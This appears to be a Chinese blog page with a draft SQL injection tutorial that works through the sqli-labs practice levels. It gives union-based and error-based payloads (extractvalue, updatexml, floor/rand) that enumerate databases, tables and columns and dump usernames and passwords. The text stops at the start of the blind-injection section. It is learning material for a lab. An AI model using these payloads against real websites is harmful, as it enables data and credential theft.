<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
       
      <meta name="keywords" content="Ymnnb" />
       
      <meta name="description" content="Ymnnb Blog" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title> Ymnnb</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/1.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-SQL注入（草稿）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
     
    <div class="article-meta">
      <a href="/2024/07/29/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E8%8D%89%E7%A8%BF%EF%BC%89/" class="article-date">
  <time datetime="2024-07-29T10:28:11.180Z" itemprop="datePublished">2024-07-29</time>
</a>   
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">3.1k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">12 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      



  
    <div class="article-entry" itemprop="articleBody">
       
  <p>SQL注入  是一种常见的Web安全漏洞，形成的主要原因是web应用程序在接收相关数据参数时未做好过滤，将其直接带入到数据库中查询，导致攻击者可以拼接执行构造的SQL语句。<br>即：注入产生的原因是后台服务器在接收相关参数时未做好过滤直接带入到数据库中查询，导致可以拼接执行构造的SQL语句<br>一、漏洞原因分析<br>        我们都知道web分为前端和后端，前端负责数据显示，后端负责处理来自前端的请求并提供前端展示的资源，即然有资源，那么就需要有存储资源的地方——如mysql数据库。那服务器如何对数据获取了？就需要使用SQL语句这一语法结构进行查询获取。SQL语句通过特有的语法对数据进行查询。<br>这里使用到sqli-labs<br>sqli-labs第一关<br>按要求在url后面加上?id&#x3D;1，显示如下<br>Your Login name:Dumb<br>Your Password:Dumb<br>select语句：SELECT * FROM users WHERE id&#x3D;’1’ LIMIT 0,1<br>当我们改变id的值为2时，页面发生了改变。说明它将我们输入的数据代入到了数据中进行查询，页面根据输入数据的不同展示的内容也不同。</p>
<p>在1后面加上单引号, ?id&#x3D;1’，页面显示有语法错误，说靠近 ‘1’’ limit 0,1有语法错误，我们输入的数据 1’ 被完整的带入到了SQL语句中，即直接与原有的sql语句进行了拼接。<br>然后执行的sql语句变成了  SELECT * FROM users WHERE id&#x3D;’1’’ LIMIT 0,1</p>
<p>我们输入的那个单引号和前面的单引号产生了闭合，导致原有后面的那个单引号变成了多余，而sql语法中引号是必须成对出现否则就会报错，这也就解释了为什么输入1’后程序就报错的原因。</p>
<p>既然我们输入什么程序就拼接什么，那我们就构造sql语句将左单引号进行闭合就好了。我们在1后面加上单引号，与左边的引号构成闭合，再接着拼接构造好的SQL语句并注释掉后边的语句 ‘  1 ‘ and 1&#x3D;1 –  ‘ LIMIT 0,1” 程序就不会报错，就可以查询我们想要查询的数据，这就是sql注入。</p>
<p>比如：<br>语句：select name from xxx where id &#x3D; ‘ 1 ‘ and 1&#x3D;1 – qwe ‘<br>这样的话，如果变量为字符型，就能被我们注入<br>为什么有一个– ，– 在sql中代表注释的意思（还有其他的注释方式）<br>– 后面的语句不会被sql识别，这样就能去掉它本身的’<br>让语句成为我们自己拼凑的语句<br>为什么是– qwe（即在– 后面在上一串字母）<br>为什么如果不加上，url被读取的时候会自动消去掉后面的空格<br>也就达不到我们想要的效果</p>
<p>二、漏洞危害<br>SQL注入漏洞对于数据安全的影响：<br>数据库信息泄漏：数据库中存放的用户的隐私信息的泄露。<br>网页篡改：通过操作数据库对特定网页进行篡改。<br>网站被挂马，传播恶意软件：修改数据库一些字段的值，嵌入网马链接，进行挂马攻击。<br>数据库被恶意操作：数据库服务器被攻击，数据库的系统管理员帐户被窜改。<br>服务器被远程控制，被安装后门。<br>破坏硬盘数据，瘫痪全系统。</p>
<p>三、sql注入防范<br>对输入进行严格的转义和过滤<br>等…….</p>
<p>四、如何挖掘sql注入漏洞</p>
<p>五、常见的注入手法<br>SQL 注入漏洞根据不同的标准，有不同的分类。如按照参数类型可分为两种：数字型和字符型。</p>
<p>参数类型分类</p>
<ol>
<li><p>数字型：当输入的参数为整形时，如果存在注入漏洞，可以认为是数字型注入。<br>如 <a target="_blank" rel="noopener" href="http://www.text.com/text.php?id=3">www.text.com/text.php?id=3</a> 对应的sql语句为 select * from table where id&#x3D;3</p>
</li>
<li><p>字符型：字符型注入正好相反<br>当输入的参数被当做字符串时，称为字符型。字符型和数字型最大的一个区别在于，数字型不需要单引号来闭合，而字符串一般需要通过引号来闭合的。即看参数是否被引号包裹</p>
</li>
</ol>
<p>例如数字型语句：select * from table where id &#x3D;3<br>则字符型如下：select * from table where name&#x3D;’admin’</p>
<p>注入手法分类<br>@   UNION query SQL injection（联合查询注入）<br>@   Error-based SQL injection（错型注入）<br>@   Boolean-based blind SQL injection（基于布尔的盲注）<br>@   Time-based blind SQL injection（基于时间的盲注）<br>@   Stacked queries SQL injection（可多语句查询注入）</p>
<p>联合查询(union注入)<br>联合查询适合于有显示位的注入，即页面某个位置会根据我们输入的数据的变化而变化 </p>
<p>例题：<br>sqli-labs第一关<br>如下，要求我们传入一个id值过去。传参?id&#x3D;1，当我们输入id&#x3D;1和id&#x3D;2时，页面中name值和password的值是不一样的，说明此时我们输入的数据和数据库有交互并且将数据显示在屏幕上了</p>
<ol>
<li>注入点判断<br>开始判断是否存在注入，输入?id&#x3D;1’，页面发生报错，说明后端对我前端的数据输入没有很好的过滤，传入的参数直接在后端拼接为sql语句了，产生了sql注入漏洞</li>
</ol>
<p>继续判断，输入 ?id&#x3D;1’ and 1&#x3D;1 –+ 页面正常显示<br>输入?id&#x3D;1’ and 1&#x3D;2 –+ 页面不正常显示，说明程序对我们的输入做出了正确的判断，所以注入点就是单引号</p>
<p>页面会根据输入的数据变化而变化，当存在注入点时，优先考虑使用联合注入手法。</p>
<ol start="2">
<li><p>判断当前表的字段个数<br>输入order by 3，页面无异常反应<br>?id&#x3D;1’ order by 3 –+<br>将3修改为4，此时显示未知的列，说明此时当前表中只有3列<br>?id&#x3D;1’ order by 4 –+ </p>
</li>
<li><p>判断显示位<br>以下为union注入中较为常用的一些函数和环境变量</p>
</li>
</ol>
<p>接下来测试输入会在屏幕哪个地方进行回显。<br>上面我们判断出来了表中有3列，所以union select的时候就写xx,xx,xx三个数据<br>需让union select前面的参数查不出来而回显后面的语句，所以id&#x3D;-1’<br>?id&#x3D;-1’ union select 1,2,3 –+ </p>
<p>补充：<br>select 1,2,3<br>select 1,2,3表示占位符<br>就比如前面id &#x3D; 0没有查到数据的时候，就会填补到查询结果中<br>例如：?id &#x3D; 1 union select 1,2,3可以查到数据<br>得到： Name：lihua  Year：2002<br>?id &#x3D; 0 union select 1,2,3,4 不能查到数据<br>那么就得到：  Name：2  Year：3<br>后面的1,2,3给顶上去<br>这里1,2,3代表有多少个字段<br>Name：2  Year：3<br>代表Name是第二个字段，Year是第三个字段</p>
<p>?id&#x3D;-1’ union select 1,2,3 –+<br>结果是：在name和password值中回显了我们的输入，这时我们就可以在回显2或3的放置放入测试语句。</p>
<ol start="4">
<li><p>爆当前数据库名字<br>我们将select 1,2,3中的3替代为sql的函数，来代替我们去查询<br>因为我们的语句会被传入到后端进行拼接，所以这些函数，例如database()，也会被传入，然后执行<br>后端的语句：<br>SELECT * FROM users WHERE id&#x3D;’-1’ union select 1,2,database() – ‘ LIMIT 0,1<br>就可以查询到数据库名字<br>?id&#x3D;-1’ union select 1,2,database() –+<br>可获取当前数据库名为“security”<br>Your Login name:2<br>Your Password:security</p>
</li>
<li><p>爆当前数据库中的表</p>
</li>
</ol>
<p>#使用语句<br>?id&#x3D;-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;database() –+</p>
<p>显示当前数据库中存在4个表“emails,referers,uagents,users”<br>Your Login name:2<br>Your Password:emails,referers,uagents,users</p>
<p>database()查到数据库名<br>如何得到表名<br>我们需要查询版本号<br>version()<br> ?id &#x3D; 0 union select 1,version(),3<br>版本为5.0以上，存在information_schema表<br>这个表可以查询到表名<br> ?id &#x3D; 0 union select 1,22,table_name from information_schema.tables where information_schema&#x3D;database()</p>
<ol start="6">
<li>爆表中的字段<br>这里选择users表进行进一步的获取表中的字段信息</li>
</ol>
<p>#指定表名<br>?id&#x3D;-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’ –+<br>#或者指定当前数据库名<br>?id&#x3D;-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema&#x3D;’security’ and table_name&#x3D;’users’ –+<br>获取”users”表中存在3个字段，分别为 “id,username,password”<br>Your Login name:2<br>Your Password:id,username,password</p>
<ol start="7">
<li>爆相应字段的所有数据<br>有了表名，字段名<br>就可以组成一个完整的sql语句</li>
</ol>
<p>#指定表名和字段名<br>?id&#x3D;-1’ union select 1,2,group_concat(id,’:’,username,’:’,password) from users –+</p>
<p>至此，联合查询整个过程结束。</p>
<p>重点在于，注入的时候找到注入点后只需套入语句即可。</p>
<p>报错注入<br>报错注入用在数据库的错误信息会回显在网页中的情况，如果联合查询不能使用，首选报错注入。<br>报错注入利用的是数据库的报错信息得到数据库的内容，这里需要构造语句让数据库报错。</p>
<ol>
<li><p>group by 重复键冲<br>and (select 1 from (select count(*),concat((select 查询的内容 from information_schema.tables limit 0,1),floor(rand()<em>2))x from information_schema.tables group by x)a) –+<br>提交如下，获取数据库名字<br>?id&#x3D;1’ and (select 1 from (select count(</em>),concat((select database() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) –+</p>
</li>
<li><p>extractvalue() 函数<br>extractvalue() 是 MySQL 中用于从 XML 类型的数据中提取值的函数。它的基本语法如下：<br>extractvalue(xml_content, xpath_expr)<br>其中各个参数的含义如下：<br>xml_content: 是一个 XML 类型的列或者变量，表示要从中提取值的 XML 数据。<br>xpath_expr: 是一个 XPath 表达式，用来指定要提取的 XML 节点或者节点集合。<br>可以这样使用： extractvalue(1，函数)</p>
</li>
</ol>
<p>?id&#x3D;1’ and extractvalue(1,concat(‘^’,(select database()),’^’)) –+<br>提交 ， 获取数据库名字<br>?id&#x3D;1’ and extractvalue(1,concat(‘^’,(select database()),’^’)) –+</p>
<ol start="3">
<li>updatexml() 函数<br>updatexml() 是 MySQL 数据库中的一个函数，用于更新 XML 类型的数据。它的基本语法如下：<br>updatexml(target_xml, xpath_expr, new_value)<br>其中各个参数的含义如下：<br>target_xml: 是一个 XML 类型的列或者变量，表示要更新的 XML 数据。<br>xpath_expr: 是一个 XPath 表达式，用来指定要更新的 XML 节点。<br>new_value: 是一个新的 XML 片段或者文本值，用来替换被选中的 XML 节点的值。<br>一般这样使用：updatexml(1,函数,1)</li>
</ol>
<p>使用：<br>and updatexml(1,concat(‘^’,(需要查询的内容),’^’),1)<br>（1） 提交如下，获取数据库名字<br>?id&#x3D;1’ and updatexml(1,concat(‘^’,(database()),’^’),1) –+<br>（2） 获取当前数据库中表的名字<br>?id&#x3D;1’ and updatexml(1,concat(‘^’,(select table_name from information_schema.tables where table_schema&#x3D;’security’ ),’^’),1) –+<br>这里是说要显示的内容超过一行它不能显示那么多，所以在 table_schema&#x3D;’security’ 后加上 limit 0,1，显示第一行（显示第0行的往下一行，不包括第0行）<br>?id&#x3D;1’ and updatexml(1,concat(‘^’,(select table_name from information_schema.tables where table_schema&#x3D;’security’  limit 0,1),’^’),1) –+<br>如果要看第二行则，limit1,1（第一行的往下一行，不包括第一行，即显示第二行），看第三行则limit2,1。以这个方法获取第四个表为users<br>（3） 爆表中的字段<br>?id&#x3D;1’ and updatexml(1,concat(‘^’,(select column_name from information_schema.columns where table_name&#x3D;’users’ and table_schema&#x3D;’security’ limit 0,1 ),’^’),1) –+<br>总共爆出的字段为： id , username , password<br>（4） 爆字段中的内容<br>?id&#x3D;1’ and updatexml(1,concat(‘^’,(select group_concat(username,”–”,password) from users limit 0,1 ),’^’),1) –+<br>三组用户名和密码。</p>
<p>基于布尔的盲注<br>       布尔盲注，即在页面没有错误回显时完成的注入攻击。此时我们输入的语句让页面呈现出两种状态，相当于true和false，根据这两种状态可以判断我们输入的语句是否查询成功。<br>以less-8关为例</p>
<ol>
<li>我们输入正确的id，显示You are in …..</li>
</ol>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2024/07/29/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E8%8D%89%E7%A8%BF%EF%BC%89/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2024/07/29/sql%E6%B3%A8%E5%85%A5%E8%8D%89%E7%A8%BF/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            (no title)
          
        </div>
      </a>
    
    
      <a href="/2024/07/29/QT/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title"></div>
      </a>
    
  </nav>

  
   
  
   
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2024
        <i class="ri-heart-fill heart_icon"></i> Ymnnb
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Ymnnb"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">hhh</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">搜索</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i></p>
  <div class="reward-box">
    
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->
 
<script src="/js/clickLove.js"></script>
 
<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>